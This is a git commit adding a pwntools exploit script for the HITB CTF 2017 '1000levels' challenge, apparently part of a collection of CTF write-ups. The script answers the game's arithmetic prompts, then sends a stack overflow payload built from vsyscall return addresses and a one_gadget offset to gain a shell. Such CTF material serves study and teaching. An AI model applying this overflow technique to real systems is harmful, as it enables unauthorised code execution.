finish 6.1.16

2025-06-24 04:05:03 +07:00 · 2018-04-21 23:47:31 +08:00
parent 638283152e
commit 9eb783da56
2 changed files with 273 additions and 76 deletions
--- a/src/writeup/6.1.16_pwn_hitbctf2017_1000levels/exp.py
+++ b/src/writeup/6.1.16_pwn_hitbctf2017_1000levels/exp.py
@ -0,0 +1,36 @@
+#!/usr/bin/env python
+
+from pwn import *
+
+#context.log_level = 'debug'
+io = process(['./1000levels'], env={'LD_PRELOAD':'./libc.so.6'})
+
+one_gadget = 0x4526a
+system_offset = 0x45390
+ret_addr = 0xffffffffff600000
+
+def go(levels, more):
+    io.sendlineafter("Choice:\n", '1')
+    io.sendlineafter("levels?\n", str(levels))
+    io.sendlineafter("more?\n", str(more))
+
+def hint():
+    io.sendlineafter("Choice:\n", '2')
+
+if __name__ == "__main__":
+    hint()
+    go(0, one_gadget - system_offset)
+
+    for i in range(999):
+        io.recvuntil("Question: ")
+        a = int(io.recvuntil(" ")[:-1])
+        io.recvuntil("* ")
+        b = int(io.recvuntil(" ")[:-1])
+        io.sendlineafter("Answer:", str(a * b))
+
+    payload  = 'A' * 0x30   # buffer
+    payload += 'B' * 0x8    # rbp
+    payload += p64(ret_addr) * 3
+    io.sendafter("Answer:", payload)
+    
+    io.interactive()